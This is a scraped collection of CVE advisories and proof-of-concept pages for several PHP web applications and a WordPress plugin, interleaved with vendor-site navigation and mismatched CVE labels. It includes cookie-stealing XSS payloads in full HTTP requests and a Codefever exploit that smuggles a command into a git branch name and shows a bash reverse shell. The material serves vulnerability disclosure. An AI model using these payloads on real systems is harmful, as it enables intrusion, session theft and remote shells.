Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the cmd parameter in the index.php component.

*   Free!
    *   AjaxNewsTicker
    *   AjaxCountDown
    *   Ajax Poll Script
    *   php Infinite Scroll
    *   Link Obfuscator
    *   CSS Obfuscator
*   Scripts
    *   Text Ad Script
    *   Ajax Likes Script
    *   pkShortURL
    *   Fade-In Slideshow
    *   Ajax Poll Admin
    *   Ajax Poll DBV
*   Support
    *   Contact Us
    *   Ask a pre-sales question
    *   Submit a support ticket
    *   Free estimate request form

Ajax Poll Script

Ajax News  
Ticker

Ajax  
Count  
Down

php Infinite Scroll

Ajax Likes Script

Text Ad Script

Fade-In Slideshow

Ajax Poll  
DBV

Contact Us

Support  
Ticket

Custom  
Programming  
Service

Ajax Poll Admin

Link  
Obfuscator

CSS  
Obfuscator

CVE-2023-41453: PHPKOBO

Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the ID parameter in the index.php component.

Vulnerability Type: Cross Site Scripting (XSS) Vulnerability

Vendor of Product: phpkobo

Affected Product Code Base: AjaxNewsTicker

Product Version: 1.05

Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload inside the "ID" parameter in "publish or view news" in the index.php component.

Attack Vectors: To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.

Attack Type: Remote

Payload: %22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e

Assigned CVE-ID: CVE-2023-41448

Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1\. Browse the the following URL: https://<target.xyz>/ntic/admin/index.php?\_rtp=run-preview&id=\*&inme=scripttag

2\. Insert payload in the "id" parameter in GET method

3\. You can create your malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.

#PoC

GET ntic/admin/index.php?\_rtp=run-preview&id=3521%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e&inme=scripttag HTTP/1.1

Host: localhost:2222

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imagewebp\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

CVE-2023-41448: CVE-2023-41448

An issue in PGYER codefever v.2023.8.14-2ce4006 allows a remote attacker to execute arbitrary code via a crafted request to the branchList component.

**Remote Code Execution Vulnerability in Codefever up to 2023.8.14-2ce4006**

> CVE-ID: CVE-2023-44080
> 
> Attack type: Remote Code Execution
> 
> FOFA Keyword: icon\_hash="-391103642"
> 
> Date: August 13, 2023
> 
> Exploit Author: pyy
> 
> Vendor Homepage: https://www.pgyer.com/ https://codefever.pgyer.com/
> 
> Software Link: https://github.com/PGYER/codefever
> 
> Version: up to 2023.8.14-2ce4006
> 
> Suggested description of the vulnerability for use in the CVE: Codefever up to 2023.8.14-2ce4006 was discovered to contain a remote code execution (RCE) vulnerability via the component /application/controllers/api/repository.php

By default, arbitrary remote code execution (RCE) can be achieved on Codefever either by directly registering a new account(by default, Codefever allows arbitrary users to register new accounts), or by obtaining a low-privilege account on the target system which allows creating a new branch for any project.

**EXP**

The attack can be carried out by following these steps:

1.  Register an account (default abled for anyone) and Create a repository (an existing repository can also be used)
    
2.  Clone the repository and create a normal branch, then push it
    
3.  Create a branch with the branch name containing exploit code
    
    git checkout -b "&&echo\$IFS\$9{{command}}|base64\$IFS\$9-d|bash&&"
    
    The command is the base64 encoding of any command to be executed. For example, bash -c 'bash -i >& /dev/tcp/ip/port 0>&1' base64 encoded.
    
4.  Then create a pull request (press 合并请求 on the page)
    
5.  Getshell
    

**More Information**

Browse this for more information. (I can not upload photos to github gist)

CVE-2023-44080: CVE-2023-44080.md

Sourcecodester Expense Tracker App v1 is vulnerable to Cross Site Scripting (XSS) via add category.

**Simple expense tracker app****Exploit Title:**

XSS Stored (Expense Tracker App Using PHP with Source Code)

**Date:**

23/09/2023

**Exploit Author:**

Xcode0x (Mohamed Almarri)

Twitter: @xcode0x

**Vendor Homepage:**

https://www.sourcecodester.com/users/remyandrade

**Software Link:**

https://www.sourcecodester.com/php/16794/simple-expense-tracker-app-using-php-source-code.html

**Version:**

v1

**Tested on:**

debian

**XSS Stored :**

Expense Tracker App v1 is vulnerable to Cross Site Scripting (XSS) via add category .

**POC \[debian\]:**

1- add category

2- in category\_name put your payload

POST /simple-expense-tracker-app/endpoint/add\_category.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://localhost/simple-expense-tracker-app/

Content-Type: application/x-www-form-urlencoded

Content-Length: 84

Origin: http://localhost

Connection: close

Upgrade-Insecure-Requests: 1

tbl\_expense\_category\_id=&category\_name=<script>alert('By:Xcode0x')</script>&category\_budget=1

**Tested**

Linux - debian

CVE-2023-44048: GitHub - xcodeOn1/XSS-Stored-Expense-Tracker-App: XSS Stored (Expense Tracker App Using PHP with Source Code)

SQL Injection vulnerability in Tianchoy Blog v.1.8.8 allows a remote attacker to obtain sensitive information via the id parameter in the login.php

\[CVE ID\]

CVE-2023-43381

\[PRODUCT\]

https://github.com/tianchoy/blog

\[VERSION\]

v1.8.8

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

SQL Injection exists in tianchoy/blog through 2018-06-19 via the user parameter to login.php.

CVE-2023-43381: CVE-2023-43381

Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.

CVE-2023-43291: CVE-2023-43291.md

A vulnerability classified as critical has been found in ForU CMS. This affects an unknown part of the file /install/index.php. The manipulation of the argument db_name leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-240363. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-5221

The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Last change on this file was 2915607, checked in by , 4 months ago

Update to version 5.3.5  

**File size:** 1.7 KB

Line

 

1

<?php

2

/\*\*

3

 \* Shortcode

4

 \*

5

 \* @package     Wow\_Plugin

6

 \* @copyright   Copyright (c) 2018, Dmytro Lobov

7

 \* @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License

8

 \* @since       1.0

9

 \*/

10

11

12

if ( ! defined( 'ABSPATH' ) ) {

13

        exit;

14

}

15

16

extract( shortcode\_atts( array( 'id' \=> "" ), $atts ) );

17

global $wpdb;

18

$table  \= $wpdb\->prefix . 'wow\_' . $this\->plugin\['prefix'\];

19

$sSQL   \= $wpdb\->prepare( "select \* from $table WHERE id = %d", $id );

20

$result \= $wpdb\->get\_results( $sSQL );

21

22

if ( count( $result ) \> 0 ) {

23

24

        foreach ( $result as $key \=> $val ) {

25

                $param \= unserialize( $val\->param );

26

                $check \= $this\->check( $param, $id );

27

                if ( $check \=== false ) {

28

                        return false;

29

                }

30

31

                if ( empty( $val\->status ) ) {

32

                        return false;

33

                }

34

35

                include( 'partials/public.php' );

36

37

                $slug       \= $this\->plugin\['slug'\];

38

                $version    \= $this\->plugin\['version'\];

39

                $url\_asset  \= plugin\_dir\_url( \_\_FILE\_\_ );

40

                $pre\_suffix \= defined( 'SCRIPT\_DEBUG' ) && SCRIPT\_DEBUG ? '' : '.min';

41

42

                $url\_style \= $url\_asset . 'assets/css/style' . $pre\_suffix . '.css';

43

                wp\_enqueue\_style( $slug, $url\_style, null, $version );

44

45

                wp\_add\_inline\_style( $slug, $val\->style );

46

47

                $effects\_url \= $url\_asset . 'assets/js/jquery.effects' . $pre\_suffix . '.js';

48

                wp\_enqueue\_script( $slug . '-effects', $effects\_url, array( 'jquery' ), $version );

49

50

                $modal\_url \= $url\_asset . 'assets/js/jquery.modalWindow' . $pre\_suffix . '.js';

51

                wp\_enqueue\_script( $slug, $modal\_url, array( 'jquery' ), $version );

52

53

                $inline\_js \= 'jQuery(function() {jQuery("#wow-modal-overlay-' . $id . '").ModalWindow(' . $val\->script . '); });';

54

                wp\_add\_inline\_script( $slug, $inline\_js );

55

56

57

        }

58

59

}

**Note:** See TracBrowser for help on using the repository browser.

CVE-2023-5161: shortcode.php in modal-window/tags/5.3.5/public – WordPress Plugin Repository

SeaCMS V12.9 was discovered to contain an arbitrary file write vulnerability via the component admin_notify.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-44169: vulnerabilities/SeaCMS V12.9 Arbitrary file write vulnerability.pdf at main · H3ppo/vulnerabilities

SeaCMS v12.8 has an arbitrary code writing vulnerability in the /jxz7g2/admin_ping.php file.

Tag

#php